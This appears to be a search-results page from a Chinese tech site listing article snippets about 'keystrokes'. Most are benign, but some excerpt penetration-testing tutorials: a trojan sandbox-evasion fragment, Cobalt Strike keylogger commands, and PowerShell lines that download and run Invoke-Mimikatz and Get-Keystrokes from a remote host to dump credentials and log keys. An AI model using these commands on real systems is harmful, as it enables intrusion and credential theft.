首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏kayden

    Windows下木马的常用功能

    import sys user32 = ctypes.windll.user32 kernel32 = ctypes.windll.kernel32 # 用于记录鼠标单击,键盘按键和双击的总数量 keystrokes # get_last_input() # time.sleep(1) def get_key_press(): global mouse_clicks global keystrokes ASCII按键是从23-127(具体可看ASCII表),为可打印字符,这就获取了键盘的敲击次数 elif i > 32 and i < 127: keystrokes += 1 return None def detect_sandbox(): global mouse_clicks global keystrokes # 定义键盘 ,单击,双击的最大值(阀值) max_keystrokes = random.randint(10,25) max_mouse_clicks = random.randint(5,25)

    66310编辑于 2022-09-29
  • 来自专栏全栈程序员必看

    Source insight 3572安装和版本号An invalid source insight serial number was detected解

    全选快捷键改动 options -> Key Assignments ,Command 输入save筛选出save的相关项, 选择save all, 首先 选中右边Keystrokes ,然后delete Command 输入select 筛选出select的相关项, 选择Select all, 首先 选中右边Keystrokes ,然后delete assignment ,最后按住键盘Ctrl+A 点击

    71420编辑于 2022-07-06
  • 来自专栏字根中文校对软件

    在windows下模拟鼠标键盘输入的几种方法 (附带源代码)

    The SendInput function synthesizes keystrokes, mouse motions, and button clicks.   The INPUT structure is used by SendInput to synthesize keystrokes, mouse motions, and button clicks.

    9.5K50发布于 2019-02-14
  • 来自专栏Ms08067安全实验室

    Cobalt Strike最实用的24条命令(建议收藏)

    11.Log Keystrokes模块 图形化操作:选择“Process List”"“Log KeyStrokes”选项。 Beacon命令行:keylogger [pid] <x86|x64>。 Log Keystrokes模块用于将键盘记录注入进程。当目标主机使用键盘进行输入时,就会捕获输入的内容并传回团队服务器,如图所示。 目标主机使用键盘输入 可以选择“View”"“Log KeyStrokes”选项查看键盘输入记录,如图9-90所示。

    4.2K11编辑于 2023-12-14
  • 来自专栏全栈程序员必看

    Optimal Keypad[通俗易懂]

    random text out of a dictionary of common words, the average typing effort (i.e. the average number of keystrokes The cutting positions should minimize the average number of keystrokes over all common words in the dictionary

    28520编辑于 2022-08-11
  • 来自专栏cwl_Java

    经典算法题-画图问题

    the cursor is at the beginning of the line or the end of the line, respectively, in which case the keystrokes You should simulate a series of keystrokes and return the final position of the cursor. You will be given a String where characters of the String represent the keystrokes made, in order. getPosition Parameters: 参数 String, int Returns: 返回值 int Method signature: 方法签名 int getPosition(String keystrokes Constraints 约束 - keystrokes will be contain between 1 and 50 'L', 'R', 'H', and 'E' characters, inclusive

    96130发布于 2020-03-19
  • 来自专栏Ms08067安全实验室

    Cobalt Strike最实用的24条命令(建议收藏)

    11.Log Keystrokes模块 图形化操作:选择“Process List”"“Log KeyStrokes”选项。 Beacon命令行:keylogger [pid] <x86|x64>。 Log Keystrokes模块用于将键盘记录注入进程。当目标主机使用键盘进行输入时,就会捕获输入的内容并传回团队服务器,如图所示。 目标主机使用键盘输入 可以选择“View”"“Log KeyStrokes”选项查看键盘输入记录,如图9-90所示。

    1K10编辑于 2023-12-14
  • 来自专栏谢公子学安全

    工具的使用 | CobaltStrike的使用

         显示受害者机器的凭证信息,能更方便的进行后续渗透; Downloads     文件下载; Event Log     可以看到事件日志,清楚的看到系统的事件,并且团队可以在这里聊天; Keystrokes 右键被控主机——>Explore——>Process List 即可列出进程列表 选中该进程,Kill为杀死该进程,Refresh为刷新该进程,Inject 则是把beacon注入进程,Log Keystrokes 键盘记录 任意选择一个进程,点击Log Keystrokes,即可监听该主机的键盘记录 查看键盘记录结果:点击钥匙一样的按钮,就可以在底下看到键盘记录的详细了,会监听所有的键盘记录,而不只是选中的进程的键盘记录

    4.2K20编辑于 2022-01-13
  • 来自专栏释然IT杂谈

    内网渗透学习-信息收集篇

    //192.168.1.4/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1") #导hash Invoke-Mimikatz -dumpcreds #get-keystrokes 键盘记录 iex(new-object net.webclient).downloadstring("http://192.168.1.4/PowerSploit/Exfiltration/Get-Keystrokes.ps1 ") #将键盘记录保存到123.txt里面 Get-Keystrokes -logpath C:\Users\admin\123.txt 翻翻配置文件 一个正常的Web应用肯定有对应的数据库账号密码信息

    81311编辑于 2022-10-27
  • 来自专栏漏斗社区

    工具| PowerShell的内网渗透之旅(二)

    Exfiltration模块 a.调用Get-Keystrokes记录用户的键盘输入。 1).通过IEX下载并调用Get-Keystrokes。 ? ?

    2.2K60发布于 2018-05-15
  • 来自专栏菲宇

    前端使用ckeditor

    word中粘贴内容时是否移除格式 config.pasteFromWordRemoveStyle = false; //设置快捷键 config.keystrokes

    1.9K40发布于 2019-10-22
  • 来自专栏前端真相

    计算机英语

    字符串 escape codes :转义码 incompatibility:不兼容 hinder:阻碍 obsolete:废旧的 editable fields 可编辑字段 keystrokes

    1K30发布于 2019-02-21
  • 来自专栏QA一隅

    Android 测试工具——Monkeyrunner简介

    you can write a Python program that installs an Android application or test package, runs it, sends keystrokes

    84430发布于 2021-08-09
  • 来自专栏渗透测试教程

    内网渗透学习-信息收集篇

    //192.168.1.4/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1") #导hash Invoke-Mimikatz -dumpcreds #get-keystrokes 键盘记录 iex(new-object net.webclient).downloadstring("http://192.168.1.4/PowerSploit/Exfiltration/Get-Keystrokes.ps1 ") #将键盘记录保存到123.txt里面 Get-Keystrokes -logpath C:\Users\admin\123.txt ?

    1.3K10发布于 2021-03-23
  • 来自专栏算法之名

    使用Random来生成随机数的危险性 顶

    SecureRandom takes Random Data from your os (they can be interval between keystrokes etc - most os collect

    77420发布于 2019-08-20
  • 来自专栏TeamsSix的网络空间安全专栏

    CS学习笔记 | 3、如何进行分布操作

    按键的日志在keystrokes文件夹内,截屏的日志在screenshots文件夹内,截屏的日志名称一般如screen_015321_4826.jpg类似,其中015321表示时间(1点53分21秒),

    48010发布于 2020-04-22
  • 来自专栏网络安全技术点滴分享

    30条顶级APT与蓝队攻防单行命令:网络战场终极对决

    enc -aes-256-cbc -salt -in comms.txt -out comms.enc部署键盘记录器获取凭证:logkeys --start --output /var/log/apt_keystrokes.log

    24210编辑于 2025-09-09
  • 来自专栏WindCoder

    Best Programming Editors? A Never Ending Battle With No Clear Winner

    through SSH and other tight spots, and you wont have problems with speed, once you get familiar with keystrokes thought creeping into one’s mind that there must be faster way to do this as one struggles through the keystrokes

    1K10发布于 2018-09-19
  • 来自专栏网络安全攻防

    命令控制之PowerShell

    键盘记录 get-keystrokes ? 查看记录信息: ? 信息如下(个人感觉这个功能并是不那么完美,至少没有记录到输入的主要信息,感觉更多的像是对操作的应用程序记录) ?

    1.2K20发布于 2021-07-21
  • 来自专栏netservice

    Install MicroK8s on Windows

    However, plenty of extra features are available with a few keystrokes using “add-ons” – pre-packaged

    91410编辑于 2022-03-30
领券